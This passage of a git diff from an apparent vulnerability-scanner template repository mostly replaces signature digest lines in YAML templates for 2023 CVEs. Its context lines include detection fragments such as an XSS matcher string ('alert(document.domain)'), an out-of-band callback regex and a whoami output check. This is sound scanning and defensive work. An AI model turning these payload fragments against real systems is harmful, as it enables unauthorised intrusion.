4a0a00473045022100b8f43200f81783f187365c589653ad29a2050ba46a41782681ecc57fbfed6942022017518deb0c7150bec65b058cc0687e118acd14f0c54396df0e503dfb9ccdf33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index f3055a28e9..f57c2fb70a 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "re not allowed to view")' - 'contains(body_2, "")' condition: and -# digest: 4b0a00483046022100d4f9766e31a70406c31c835f8270e2af7075425d8885b1519f377a02aa44d40b022100c7ee4a52e5306722a42a312422ccd8dff7a430ff514ad6d54af2596843d082b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037fd184a30baa4bf9c5bead97935ec384efbce6d629f36e79fdc4a6f96c2a5d0022100fdeb0ca8f655e4f1856990096615ff0c35961dd2dea9984283364c1c0c9cc6ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 071b29016e..074ffba78d 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Ninja Forms")' condition: and -# digest: 4a0a00473045022100f374850f3db246366d4934f1b41e6db288da467c7ea228583bf7b1aba1f303c70220720aabef42100ac5be84b8fb96ed331065187fa5b02c93af47b6a316d1b5bb2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5e7a1e57dcb12a58b14088fffc8b645c336e75e181bb9e86ad3afa2cd124f16022100b7094b86bf5ee74099a6da69ea87a76394fbb02765149b058c67daca7ac66a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index 2427c34a71..f4b580719f 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -39,4 +39,4 @@ http: - 'contains(body, "phpmyfaq") && contains(body, "")' - 'contains(content_type, "text/html")' condition: and -# digest: 4a0a00473045022100daf1a63f1522ba50a51ec61c2c98c786e2b5360a32241ce1607faf33a162f9a502205500c91cbcfd5c8a3b0433229fbbacc2a002fbfaeca39ca25c0175f027118db0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b480a371ae035c47014eec72651c9396eb2f4cbb16cef0e087536bdb0401ade02203534bd6903549f0f9c3753092efb1d6cdf4adda76ba68f6fd7ab8557a659d271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index c9919cbedd..c1dba8bb95 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "tablesome")' condition: and -# digest: 4b0a00483046022100b5da459f9236a1434d252755e6900ea011673ceb398e660af35b2d01ece124230221009d704ddff924f3f850050e020d592efbb7dfaffffc34d9dc40fc4fca889dc86e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4ea7f06a84e16fe857d3fb6c8b915ddd7c277fa55d2b0b7341954486290763502202b6315a3b0fea762b9c94cf5ce30c251a14e7b0ac555ad55dad8d54b799b841d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 4fc46cd88a..53ca70e617 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -80,4 +80,4 @@ http: part: body_3 words: - "{{html_comment}}" -# digest: 4a0a0047304502205611a4d8775597b3e51d4cccfb59b213197a025c52d3c5423462cdb40afb01a1022100b7fd896cf951470a5d99892da51c299a0023a47c26d3b2be8a105404f2035563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index 587a044952..4783e1fe8b 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -61,4 +61,4 @@ http: group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' -# digest: 4a0a00473045022100c7537e17a18798b932fe6b5840379be933cac5ce6dc7dfc50270600a7cfec34f022037dfcf729eaa1d92c5380c09028689180321b89dfce595395b1b94796fa60c24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 849d8b3ec6..1f3d57af08 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -51,4 +51,4 @@ http: - contains(body_2, "onanimationstart=alert(document.domain)//") - contains(body_2, "Custom 404 Pro") condition: and -# digest: 490a00463044022048d573720726d1cd92f10ff43dfadcbb3d22556d7c698fadf7d583a1959fc9f4022010d89fa04e9e9d8d1bcc8cbcab8a56649856bad4ff7b67675c0c288f0789bba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 5ddbd433db..98345d1968 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -63,4 +63,4 @@ http: internal: true kval: - "X_CSRF_Token" -# digest: 4a0a00473045022071a222adb84811139717b3b807928f2852bea354d3457952138b46f674c99dee022100c86c3d548be36de870603832b71a934c5c2e9221edb23a47aec77ee1186e40f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index b70a70b6e6..5c4d6d49fd 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203d541b2945cd1f41d0e9680192d8e9df5829f0cade1ba4f9f6f5b546693f76b0022100ec3c6577a592fbbbb29b0814f560431059f62b6959a4658f47bc51821ffaa264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index ab180e2a41..3ef490f294 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Image optimizer")' condition: and -# digest: 490a004630440220132e6d7b963fbb7494a3b0f57529df3bdc8673d342542948b1f7682e20711208022049602daf050c977c16ab0bfb8eaa06fc598acbcac2e05eb501364b212623bb4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index a1d5491e6e..3731dd9ca1 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and -# digest: 4b0a00483046022100f93aa3cb6cc2edb0c5997f79575a8da8b4d0cf79e014bca412d5022d9835097d022100fd54e5996ca9f390bfbe63f13565229fc58738c5b04f2eb3e8edaef8f90a37fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index 0a5dcdaec3..06d086c21f 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022002e97397280b084d4e33782d005e2efe62ddf0e2e28fb4bf8491dd7c2410555c022100c7e4e8c23805b7b251d409ce2641c10822e183999382a51662b9a78218abef2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2644b825543fc67f02663f2acb50beba0821a8bfc2bc784906c2212b716c165022100fbf55e2f84b2a12206b0c96e16aa7f81405c4f6d3e40e73fbd909f2a5deb5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 81c4795fca..4e668bef11 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 303 -# digest: 4a0a00473045022047bbf498b93ea3ba22be9bae9bf3349b3479e64fcb2f3728c41e1f8230995d60022100d5d001b0655d93116f6f74b469c6c0d265edb157297ea13761327d87114f27ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f782b159b26b41f6b49ca4263a7106cbc2ef40aba7e1c835f44948dcd5c9731022035bed350905f56247f1d8d9aef6e107d58accb233e8ebb5bc8e8e2f78363f2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 59473003f3..a138f73917 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -78,4 +78,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d8132a29ee498d629870441e6a0bce9bd2f4d383f1793135c033c53a8c072fdf02202cb63627fa91041621e785126d18d76914aad2d5078d4c5bffd22e3ef0037dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048f769f84bc3e713a4aaf0510d2310cf2fa4c1f267e818f139d8c2c695d75af6022035cac70cbbb1ca8758491a2c026365cf8f96d067cdb375d4f3f2570a28171663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 7967ca1f22..cb4ece937a 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022053eb05e65d5346c93f674fb5c6f7eb114b2fa767b61dd2979526ef5e862e150c02203304db0fc9509cb0b4024993c092ff48de7cfa04fe24308983f3f0d942ee4990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a3a8ab93d344a4ea4552af7e38e910f1d753961585a43185a1c2aceb03385e1022100a393cf6a17ba4fc35342bd2c698a9bc9fb108546b52580c6bff53c0a76f26fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 60690bd831..bb42a9d8b3 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203ddccb5e82e46341cb0d08f8bd4b908bcd118468c35b667b02dcd56a9c540aca02202d59f8315992fcc3395bbaff31696e65aeaf8ff5ef8c4e8a309e275b6cbba26b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee12904d65e9c992c05a8c326ff56e80b778ef16acda7ced68f94e57609f2c58022100cb41bf91ee715b8d3da808ba74a8e3bf043eb12511541341d3ede714a88843e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index f9ee8f91d7..f78c29e559 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -58,4 +58,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 490a004630440220467b2b7d3f128ab62efc3bb8a828d55f3efdb269a6981a9ff6a3f022a65062640220274906d9883bcf4b879c9c2cc15eaf26d14ea86abdf2ffa80b955199098a1a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bfe2427057a021c02b45e8933fad188130ca08bbb54211b7d88907f02834dce6022100d073c6584b72693b5d1493b8fc4df8ff572a6c26046d83a428f83dfba54cec0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index c830eb7c77..22fe7e3409 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a8d7e7b989a74e3efd53796b8c3000b65d930e57b0c7b04db3739cbbbfe2995d022100c498b844e6a3b69edaab166bb8fca59dfaf3e0c6e01c4d771dd4f26580e22310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076aa83db4416dab98b44af5bbef532fbcc276d86523e0cbb68791c6f23624d9202204df4ce1bc02f82a0e4f75d2b8dbdc207c612b747fd45f47dc8ba90350a1674a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 5899b3b0b8..aaed7fb243 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -49,4 +49,4 @@ http: - type: dsl dsl: - x_vuln_check # prints the output of whoami -# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a2fdad5fe27eb6c457c1bdac60461a10e3dd24f3b61a3883903ef1492f18d7202203ef5a8e34b86a3e1e139c76a3daee72643cb00ae3205564fa729bf4ce9a148ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index ed9b4c10b1..d6f8c53b56 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -49,4 +49,4 @@ http: - 'status_code_1 == 200' - 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")' condition: and -# digest: 4a0a0047304502201aa0684e6091211548ef46d62c3f036b2ff121c04ed8453aec9e8f0e4e5c1069022100cb83882a20b38860591cbc8b2de989440502c8e526af3d6c78152fee7d3f7fda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202404926dcf3a6a42dccec5b59e3d4dc2a13748530e430330c1563e0d676d440002207238a9a44101263d3b8d936b7e391dd9274756d519f77c7f49df13faab120930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 9996cd9caa..eda7da80c5 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -42,4 +42,4 @@ http: - 'contains(body, "")' - 'contains(body, "qem_calendar")' condition: and -# digest: 4a0a00473045022100953f2412214a63f383bec22d4b23628dd74bf4a9b553f602930322e372cdf0db0220239bff8e1da031ab8edf1e9d9aaf2318d2f54c0ffabb7e497f114fbd567781e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f3e95e9556a9b9ec5ade59d7f4572f3867d7c2c8a1d7b95ae257a372f41c7ea02203ca63137dbaab35e0a9cd15cdc7b6002cf777667358a298c96fe3f5703172f5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index ed9666334b..04fa783e7a 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -71,4 +71,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4a0a00473045022100bdef9356eea82e42c05ad8259c61e21d78d8bbc9c09571311865b6ace5b572da02205d2d20752dfc172576b4b87a823438d9890f183945ae83675b5aca04d19995ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201dc691af618aeb7ae1784f119f04c2ae83a05a8b759601debe738dd5c11308e1022100a5df5635703f52bc26e0ed9760ccc09d6f92a23a35e8c13c9b272a203d54b34a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index be2f1ac371..b046979578 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d46873205102a134cb8a6347fb89d6e92b725e4164ae18fa887708b58e9d52950221009e1709593622b639f690e3941cb8f8927e7f855708a11e4aac7b0a958006b77e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100864e11cd58027c669cee192c677ee283ed0733f2678005853b921cfb44f28b3102200322c72442e008b6ef888ff07403a0ec4d6adf83bcfc2588e2787801ef103cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 3c48c7f2c4..904c250e19 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -62,4 +62,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' -# digest: 490a0046304402205da7cab8d8af553734b5f1c9203e90944a89fecdb12b73130bd97a508abf49bb022024325216beeb52a5e651a6cc678fc4dfa622158a1a0535f6464bb780be2f111a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e02ace90a1a3782dc846f7db6c3799e3e6f2dbd7db12315587f79f87591c3e76022100d83634800b925f23dbb1f24ae13c6577e8531c7008b64b40c03a95995e205afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index a97753ca0f..f6b110e77e 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040396f037cc9cea80c04601d3401eeb797aeba259d7fc69b7f7df238baebe834022100eb5ab6155cf439c9178be8c59d813181944a0345852c289edf082cc816d65cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d08cf09e7dc5425596c3cca412921a6990b702806ce847b868b3179a77b3dfca022051df8f622f5f78b42f4466f8f3cf2e9fbc6b5eccf03b1270d759323219651ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 0a34721f1f..d04f3ed161 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 4a0a004730450220369960afa5235cd8b70bdeb4c4e0f3defe145e797b0205595f8c4fc709c2c82f0221008a6017abf75634e05066517edd1fea0ba4d9686e6af4aeb5d2768ada9091ba9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ceae583574e8508ec06b34037f78dc1c5f19ddc0b9d7c67ca4b8d421f11f32b802205b406cd0b8fb8a762e03ccc5cfbe8aedd976adc4e1b121163062d916f54bb57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 882ec49c3f..91572fef17 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a45414945151b90fa67fa7e079fbbb92450f502cf87a8d3b8f3009ff206e04ed022100ae9eaf721875c6b33d2a40273a364319694a5f821edc482000b42ef92e452f74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a433ef07e25a34aa6e771afe6bcd7421f7d8f9da2a819104633dfaebb224713022057a7b3b74f01ee1509016fec6b6e58f2647005bff55b022b5ac8592a800fe4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 6cbac1d95b..e63de7c084 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100edbb7e3751d60cbcf1c0f2255318f740cd81ab89fc21a6a719b3d90e7ee537c1022044625fc9e0e6082b04c3d4037bf08d59a5d6f1beddc338452e5f6eaeb7a293c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3543011414a95d92a92d49677025acf633380fe2b7f42668cac5c7352466dd5022100fb6ff50e66a0ef042fe1a9d2f16946b7092d1049b62c8660449fb6c7fec3fd16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml b/http/cves/2023/CVE-2023-25194.yaml similarity index 94% rename from http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml rename to http/cves/2023/CVE-2023-25194.yaml index 7c295f8671..c250daba2a 100644 --- a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -96,4 +96,4 @@ http: - type: status status: - 400 -# digest: 4a0a004730450220253e393d9460c536f32f54253122a4cbfbbb890af4cd35b91b95d10e1b94d6b8022100e0a025041c041e62a80292747511e4d1af8e4adbe51386321a14466077c090aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index b1c9316e01..20143feedc 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc80e1cf626982f1fad7449cc8265dbe1c93e3be97fdc42fe440ac881f1cf18c022100dd6fc87b99800313cdf90e322f7d69fb782c913edcc1d48b992affa0debb8a7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab816efcbc5a7db8eacab493caab83f3dba6c09efceae69db79af63d2d711e3c02204b221648b2e6153a538e9fd48e38ff9a6a67590aa66a6b7a9e031080ffa9edc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 1191c72b94..6d904ca21a 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -56,4 +56,4 @@ http: - type: dsl dsl: - contains(interactsh_protocol, "dns") -# digest: 490a004630440220094020844a0d4ca8be740bc6836c2c1d5deae66bbdcc1acb046dc582e7e6262902202355ac1ea2b61e187c2eab84e5091bc70010f0d35badb926a36dd5bb727f4d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b4a73452ed681a25f40c5d8e7147de5a1a677aa0219ecfccd0e91aa6d829e010220268da47753cbd7b38ff64871e15e81c9fea1d053df5af7339687863c544545f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 3f606f3c49..21b9d3339d 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -51,4 +51,4 @@ http: - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and -# digest: 4a0a0047304502206881d5b1e598317af061b60f821e466075795a37a0f93409baa5f5821e33b5760221008f73ce734a8f7c3778457fe33ba32f1554ed022f7f2bacb04bc6ff281be1cf00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055d1b7e4c95893decc3dab3d84fe9989e8494bc49b7e6b893d84cc1e4a048b7302207371bad702700e3d7e1d2e24c86e16fb9f9562046931dfcf368e5769c2c600ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index 11bcc5b14f..e713be332a 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb9673e5cf15593d86fab1fedee0fff74aeaa24ecad9c6e54f5c5a19e015d47d02200f2ce80a4eb04fef3e46a1d1cd94e54865c99ed81c53071ad8e36e31c947f7f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff9ea4c7bbd58eacf86b3cf227f3254dda5e64c7b988c29f30139e7ad99bb7a0022100e070f165193a71a78fb1a8a365556a407e03a9e1e1de475e39814e5196600017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index d3619ee3c3..946523a074 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -73,4 +73,4 @@ http: name: csrf regex: - 'name="csrf_test_jorani" value="(.*?)"' -# digest: 4a0a004730450220132f0383e1f0b51b6759b6457965c65b34e8d8390bb8d03edb6d050f25f343da022100b124b8164dd0b55ac90c4606139f6c37b5a4e471a3242bb020af77dc68557294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f279f5993ac3512238a3baf207fb2cfa9f07d9d31bf2d9ee9d1212e917d91b34022100de2f0ebf49d0310cbc6e77af37ca9cf46d60093728af9a2d07cc56878928ae0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index bd8f0b0d6a..8d345d1047 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -72,4 +72,4 @@ http: regex: - "([0-9]+)" internal: true -# digest: 4a0a00473045022100d5631562022d701a9a8878ea8b8f46fd486b8f210056285bec4525324bb876c102204ade2b59aa8b8627e354241ead54bda6b22dd1ed8f1a3c9432291a013c7c1e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 